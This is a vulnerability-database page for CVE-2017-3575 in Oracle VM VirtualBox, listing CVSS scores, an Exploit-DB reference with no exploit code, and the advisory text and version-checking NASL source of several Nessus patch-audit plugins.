Vulnerabilities > CVE-2017-3575 - Local Security vulnerability in Oracle VM VirtualBox
Attack vector
LOCAL Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.0.38 and Prior to 5.1.20. Easily "exploitable" vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.0 Base Score 7.9 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H).
Vulnerable Configurations
Exploit-Db
| file | exploits/multiple/dos/41906.txt |
| id | EDB-ID:41906 |
| last seen | 2018-11-30 |
| modified | 2017-04-20 |
| platform | multiple |
| port | |
| published | 2017-04-20 |
| reporter | Exploit-DB |
| source | https://www.exploit-db.com/download/41906 |
| title | Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write |
| type | dos |
Nessus
NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-534.NASL description This update to virtualbox 5.0.40 fixes the following issues : These security issues were fixed (bsc#1034854) : - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Shared Folder). Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data as well as unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. These non-security issues were fixed : - Storage: fixed a potential hang under rare circumstances - Storage: fixed a potential crash under rare circumstances (asynchronous I/O disabled or during maintenance file operations like merging snapshots) - Storage: fixed a potential crash under rare circumstances (no asynchronous I/O or during maintenance file operations like merging snapshots) - Linux hosts: make the ALSA backend work again as well as Loading the GL libraries on certain hosts - GUI: don last seen 2020-06-05 modified 2017-05-03 plugin id 99957 published 2017-05-03 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99957 title openSUSE Security Update : virtualbox (openSUSE-2017-534) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2017-534. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(99957); script_version("3.5"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-3513", "CVE-2017-3538", "CVE-2017-3558", "CVE-2017-3559", "CVE-2017-3561", "CVE-2017-3563", "CVE-2017-3575", "CVE-2017-3576", "CVE-2017-3587"); script_name(english:"openSUSE Security Update : virtualbox (openSUSE-2017-534)"); script_summary(english:"Check for the openSUSE-2017-534 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update to virtualbox 5.0.40 fixes the following issues : These security issues were fixed (bsc#1034854) : - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Shared Folder). Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data as well as unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. These non-security issues were fixed : - Storage: fixed a potential hang under rare circumstances - Storage: fixed a potential crash under rare circumstances (asynchronous I/O disabled or during maintenance file operations like merging snapshots) - Storage: fixed a potential crash under rare circumstances (no asynchronous I/O or during maintenance file operations like merging snapshots) - Linux hosts: make the ALSA backend work again as well as Loading the GL libraries on certain hosts - GUI: don't crash on restoring defaults in the appliance import dialog" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034854" ); script_set_attribute( attribute:"solution", value:"Update the affected virtualbox packages." ); script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:python-virtualbox"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-tools"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-x11"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-host-source"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-qt"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-websrv"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.1"); script_set_attribute(attribute:"patch_publication_date", value:"2017/05/02"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/03"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.1)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.1", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(x86_64)$") audit(AUDIT_ARCH_NOT, "x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.1", reference:"python-virtualbox-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"python-virtualbox-debuginfo-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-debuginfo-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-debugsource-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-devel-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-guest-desktop-icons-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-guest-kmp-default-5.0.40_k4.1.39_53-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-guest-kmp-default-debuginfo-5.0.40_k4.1.39_53-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-guest-tools-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-guest-tools-debuginfo-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-guest-x11-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-guest-x11-debuginfo-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-host-kmp-default-5.0.40_k4.1.39_53-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-host-kmp-default-debuginfo-5.0.40_k4.1.39_53-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-host-source-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-qt-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-qt-debuginfo-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-websrv-5.0.40-40.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"virtualbox-websrv-debuginfo-5.0.40-40.1") ) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "python-virtualbox / python-virtualbox-debuginfo / virtualbox / etc"); }NASL family Misc. NASL id VIRTUALBOX_5_1_20.NASL description The version of Oracle VM VirtualBox installed on the remote host is 5.0.x prior to 5.0.38 or 5.1.x prior to 5.1.20. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Core component that allows a local attacker to disclose potentially sensitive information. (CVE-2017-3513) - A flaw exists in the Shared Folder component, specifically when cooperating guests access files within a shared folder while moving it. A local attacker within a guest can exploit this to read arbitrary files on the host. (CVE-2017-3538) - Multiple unspecified flaws exist in the Core component that allow a local attacker to impact confidentiality, integrity, and availability. (CVE-2017-3558, CVE-2017-3559, CVE-2017-3561, CVE-2017-3563, CVE-2017-3576) - An unspecified flaw exists in the Core component that allows a local attacker to impact integrity and availability. (CVE-2017-3575) - An unspecified flaw exists in the Shared Folder component that allows a local attacker to impact integrity and availability. (CVE-2017-3587) Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 99509 published 2017-04-20 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99509 title Oracle VM VirtualBox 5.0.x < 5.0.38 / 5.1.x < 5.1.20 (April 2017 CPU) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(99509); script_version("1.12"); script_cvs_date("Date: 2019/11/13"); script_cve_id( "CVE-2017-3513", "CVE-2017-3558", "CVE-2017-3559", "CVE-2017-3561", "CVE-2017-3563", "CVE-2017-3575", "CVE-2017-3576", "CVE-2017-3587" ); script_bugtraq_id( 97698, 97730, 97732, 97736, 97739, 97744, 97750, 97755, 97759 ); script_name(english:"Oracle VM VirtualBox 5.0.x < 5.0.38 / 5.1.x < 5.1.20 (April 2017 CPU)"); script_summary(english:"Performs a version check on VirtualBox.exe"); script_set_attribute(attribute:"synopsis", value: "An application installed on the remote host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Oracle VM VirtualBox installed on the remote host is 5.0.x prior to 5.0.38 or 5.1.x prior to 5.1.20. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Core component that allows a local attacker to disclose potentially sensitive information. (CVE-2017-3513) - A flaw exists in the Shared Folder component, specifically when cooperating guests access files within a shared folder while moving it. A local attacker within a guest can exploit this to read arbitrary files on the host. (CVE-2017-3538) - Multiple unspecified flaws exist in the Core component that allow a local attacker to impact confidentiality, integrity, and availability. (CVE-2017-3558, CVE-2017-3559, CVE-2017-3561, CVE-2017-3563, CVE-2017-3576) - An unspecified flaw exists in the Core component that allows a local attacker to impact integrity and availability. (CVE-2017-3575) - An unspecified flaw exists in the Shared Folder component that allows a local attacker to impact integrity and availability. (CVE-2017-3587) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?623d2c22"); script_set_attribute(attribute:"see_also", value:"https://www.virtualbox.org/wiki/Changelog"); # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?eb4db3c7"); script_set_attribute(attribute:"solution", value: "Upgrade to Oracle VM VirtualBox version 5.0.38 / 5.1.20 or later as referenced in the April 2017 Oracle Critical Patch Update advisory. Note that vulnerability CVE-2017-3538 was fixed in versions 5.0.34 and 5.1.16."); script_set_attribute(attribute:"agent", value:"all"); script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-3576"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/13"); script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/20"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:vm_virtualbox"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("virtualbox_installed.nasl", "macosx_virtualbox_installed.nbin"); script_require_ports("installed_sw/Oracle VM VirtualBox", "installed_sw/VirtualBox"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("install_func.inc"); app = NULL; apps = make_list('Oracle VM VirtualBox', 'VirtualBox'); foreach app (apps) { if (get_install_count(app_name:app)) break; else app = NULL; } if (isnull(app)) audit(AUDIT_NOT_INST, 'Oracle VM VirtualBox'); install = get_single_install(app_name:app, exit_if_unknown_ver:TRUE); ver = install['version']; path = install['path']; # Affected : # 5.0.x < 5.0.38 / 5.1.x < 5.1.20 if (ver =~ '^5\\.0' && ver_compare(ver:ver, fix:'5.0.38', strict:FALSE) < 0) fix = '5.0.38'; else if (ver =~ '^5\\.1' && ver_compare(ver:ver, fix:'5.1.20', strict:FALSE) < 0) fix = '5.1.20'; else audit(AUDIT_INST_PATH_NOT_VULN, app, ver, path); port = 0; if (app == 'Oracle VM VirtualBox') { port = get_kb_item("SMB/transport"); if (!port) port = 445; } report = '\n Path : ' + path + '\n Installed version : ' + ver + '\n Fixed version : ' + fix + '\n'; security_report_v4(port:port, extra:report, severity:SECURITY_WARNING); exit(0);NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-533.NASL description This update for virtualbox to version 5.1.22 fixes the following issues : These security issues were fixed (bsc#1034854) : - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Shared Folder). Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data as well as unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. These non-security issues were fixed : - GUI: don last seen 2020-06-05 modified 2017-05-03 plugin id 99956 published 2017-05-03 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99956 title openSUSE Security Update : virtualbox (openSUSE-2017-533) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2017-533. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(99956); script_version("3.5"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-3513", "CVE-2017-3538", "CVE-2017-3558", "CVE-2017-3559", "CVE-2017-3561", "CVE-2017-3563", "CVE-2017-3575", "CVE-2017-3576", "CVE-2017-3587"); script_name(english:"openSUSE Security Update : virtualbox (openSUSE-2017-533)"); script_summary(english:"Check for the openSUSE-2017-533 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update for virtualbox to version 5.1.22 fixes the following issues : These security issues were fixed (bsc#1034854) : - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Shared Folder). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Shared Folder). Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data as well as unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows 